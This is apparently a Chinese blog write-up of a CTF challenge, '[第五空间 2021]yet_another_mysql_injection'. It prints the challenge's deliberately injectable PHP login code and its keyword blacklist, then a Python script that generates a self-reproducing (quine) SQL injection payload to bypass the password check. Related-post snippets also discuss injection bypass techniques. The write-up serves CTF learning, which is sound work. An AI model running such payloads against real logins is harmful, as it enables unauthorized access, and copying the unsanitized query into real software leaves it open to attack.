[第五空间-2021]yet_another_mysql_injection

最新推荐文章于 2024-06-29 00:28:48 发布
最新推荐文章于 2024-06-29 00:28:48 发布
阅读量253 收藏 3
点赞数 6
分类专栏: CTF 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liaochonxiang/article/details/138169721
版权

title:[第五空间 2021]yet_another_mysql_injection

查看网页源码

image-20240424205714012

访问view-source:node4.anna.nssctf.cn:28356/?source

得到题目源码

<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
        die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}

if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>

代码审计

username必须为admin

password输入必须和数据库中查询到的一样

# quine 生成脚本
def quine(data, debug=True):
    if debug: print(data)
    data = data.replace('.', "replace(replace(.,CHAR(34),CHAR(39)),CHAR(46),.)")
    blob = data.replace('.', '"."').replace("'", '"')
    data = data.replace('.', "'" + blob + "'")
    if debug: print(data)
    return data


"""
.填充的东西执行完之后和data一样
"""
data = "1'/**/union/**/select/**/(.)#"
quine(data)
#1'/**/union/**/select/**/(.)#
#1'/**/union/**/select/**/(replace(replace('1"/**/union/**/select/**/(replace(replace(".",CHAR(34),CHAR(39)),CHAR(46),"."))#',CHAR(34),CHAR(39)),CHAR(46),'1"/**/union/**/select/**/(replace(replace(".",CHAR(34),CHAR(39)),CHAR(46),"."))#'))#

image-20240424210318013

liqingdi437
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB 2021-第五空间 yet_another_mysql_injection
Jay17的博客
07-05 925
CTFHUB 2021-第五空间 yet_another_mysql_injection
[第五空间 2021]yet_another_mysql_injection
bossDDYY的博客
11-10 1558
打开题目 查看源码 发现可用信息。,试试登录,返回flag。
第五空间yet_another_mysql_injection
最新发布
2301_80113257的博客
06-29 256
这时用quine注入。核心思想就是让sql语句执行的结果等于sql语句本身,来绕过这个验证。注出来fc3e129bd11f8e7ecf9fc816:eg1b5c4,但是密码显示错误。<>(大于小于号) -> least(),greatest()这题可以用上面链接中的脚本生成这个payload。根据提示访问source得到后端代码。结果和password是一样的!猜测password。先看最终的password。执行内层REPLACE。空格 -> /**/password变成。
[第五空间 2021]yet_another_mysql_injection wp
Leaf_initial的博客
07-07 417
在这个语句中,攻击者使用了 HEX 编码来表示 LIKE 运算符右侧的字符串,这个字符串实际上是 “unique_detect” 的 HEX 编码。由于白名单只允许使用特定的字符或字符串,而不允许使用特定的运算符或操作,因此攻击者可以使用这种方法来绕过白名单的限制,从而执行恶意的操作。白名单是一种更安全的防御措施,它会检查用户输入中是否包含一些特定的字符或字符串,并只允许这些字符或字符串被用于查询。都没有被过滤,可以编写脚本爆破密码 ,我这里直接找了一个师傅的脚本。直接访问,弱口令试一试就过了,账号。
MySql(四)SQL注入
爱是与世界平行
03-06 736
MySql(四)SQL注入一、SQL注入简介二、应用开发中可以采取的应对措施2.1 PrepartStatement+Bind-Variable2.2 使用应用程序提供的转换函数2.3 自定义函数进行校验 一、SQL注入简介 结构化查询语言( SQL)是一种用来和数据库交互的文本语言。SQL注入( SQL Injection )就是利用某些数据库的外部接口将用户数据插入到实际的数据库操作语言(SQ...
test333333333.rar_Not Yet_Not tested yet_ofdm
09-24
【标题】"test333333333.rar_Not Yet_Not tested yet_ofdm" 暗示了这是一个关于OFDM(正交频分复用)技术的未测试文件集合,可能包含了一些代码或者文档。 【描述】"not tested yet but dont sownload. just tested...
thj.rar_33s,co/7ThJ_Not Yet_THJ-456
09-23
标题 "thj.rar_33s,co/7ThJ_Not Yet_THJ-456" 提供的信息可能是指一个名为 "thj" 的压缩文件,该文件与一个域名或路径 "33s,co/7ThJ" 相关,并且带有标记 "Not Yet THJ-456",这可能表示这是一个未完成或正在开发...
api-level.rar_Not Yet
09-19
Magic version number for a current development build, which has not yet turned into an official release.
mysql injection_SQL Injection with MySQL
weixin_35203962的博客
01-27 205
整个渗透过程就结束了,不过由于黑白把入口给改了,无法登陆,但我们仅仅测试注入,目的已经达到了,就没有必要进后台了,我后来又继续构造SQL语句来验证我们获取的密码是否正确,依次提交:http://127.0.0.1/ymdown/show.php?id=10unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhe...
[Injection]对MYSQL 5.0服务器以上版本注入
Gabriel的专栏
09-15 769
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
第五空间web复现
unexpectedthing的博客
09-27 739
@[]
解:[第五空间 2021]yet_another_mysql_injection--TLS_预备队任务(1)
river_mouth_man的博客
03-11 194
sql盲注,like模糊匹配
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 621
[第五空间 2021] wp
Quine-[第五空间 2021]yet_another_mysql_injection
qq_74426248的博客
07-24 372
文章为[第五空间 2021]yet_another_mysql_injection的详细解析,欢迎一起讨论交流!!
2021第五空间webakwp
fmyyy1的博客
09-18 1113
前言 挺傻逼的,5道web题全是静态靶机,三道rce题,一直有人搅屎,不知道主办方咋想的。 附一张图 不过也算是ak了web 总体感觉还不错 webftp 这题就要说到搅屎的问题了,我直接扫路径扫到1.txt看到flag,大概是哪位大师傅放的 赛后跟别的师傅聊了一下,预期解是github上能下载源码然后看就行。 EasyCleanup 源码逻辑很简单,给了phpinfo和任意文件包含 这里的 session.upload_progress.cleanup 是off的,不会自动清除session文件 那
2021第五空间线上赛web wp
cosmoslin的博客
09-18 649
pklovecloud <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __c
[第五空间 2021] Web题解
weixin_51804748的博客
01-18 4970
WebFTP 题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码 使用说明 1、初始账号 超级管理员 admin 密码 admin888 成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag EasyCleanup <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GE
2021第五空间WEB
~airrudder~
02-24 3010
2021第五空间web部分复现
yet_another_mysql_injection
06-06
yet_another_mysql_injection是一种MySQL注入攻击的形式。MySQL注入攻击是指攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取或篡改数据库中的数据。这种攻击方式常常利用Web应用程序中的漏洞,例如未经过滤的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值